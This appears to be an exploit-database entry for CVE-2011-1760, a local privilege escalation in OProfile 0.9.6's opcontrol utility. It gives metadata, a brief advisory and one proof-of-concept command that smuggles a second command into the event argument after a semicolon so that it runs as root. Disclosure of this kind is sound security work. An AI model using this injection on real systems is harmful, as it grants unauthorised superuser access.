OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation

Author: Stephane Chauveau
type: local
platform: linux
port: 
date_added: 2011-04-29 
date_updated: 2015-01-03 
verified: 1 
codes: CVE-2011-1760;OSVDB-72792 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/47652/info

OProfile is prone to a local privilege-escalation vulnerability.

An attacker can exploit this issue to run arbitrary commands with superuser privileges.

The following example command is available:

sudo opcontrol -e "abcd;/usr/bin/id"